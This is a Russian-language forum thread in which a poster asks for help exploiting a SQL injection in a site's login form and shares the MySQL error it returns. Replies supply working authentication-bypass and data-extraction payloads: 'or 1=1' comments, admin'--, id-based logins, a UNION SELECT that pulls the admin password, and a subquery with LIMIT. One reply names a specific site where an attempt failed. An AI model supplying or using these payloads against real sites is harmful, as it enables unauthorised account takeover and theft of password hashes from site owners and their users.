Есть сайт. Есть форма с логином и паролем без фильтрации на символы. Когда ввожу что то типа: логин: rrr' пасс: njhj получаю ошибку SELECT id FROM Users WHERE login = 'rrr'' AND password = MD5('njhj'); caused error: Ошибка Ошибка запроса к базе данных. Попробуйте попытку ещё раз. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'njhj')' at line 1 Направьте в нужное русло все что знал перепробовал. Помогите заюзать багу
в поле логин or 1=1/* можно добавить limit 0,1 - тогда скорее всего будет админ А можно просто rrr/* - юзер будет rrr пароль любой Имхо...
Я бы попробовал: SELECT id FROM Users WHERE login='admin'-- т.е. login:admin'-- или SELECT id FROM Users WHERE login='' or id=1-- т.е. login:' or id=1-- Думаю у админа идентификатор единичка, так что прокатит, если что перебери другие. А может исчо енто поможет: SELECT id FROM Users WHERE login='' UNION SELECT password FROM Users WHERE id=1-- т.е. login:' UNION SELECT password FROM Users WHERE id=1-- Потом расшифруешь... А при 1=1 пишет "Здраствуйте, " наверно потому, что идентификатор ноль стоит у гостя, и именно этот пользователь и является первым подходящим под запрос...
Попробуй через подзапрос Code: blah' or login=(select login from users limit 0,1)/* юзеров переключаем первым значением в лимите
http://sevclick.com оно там не пашет. двойная проверка? хз имхо ' or 1=1 limit 0,1/* подрубится под амином
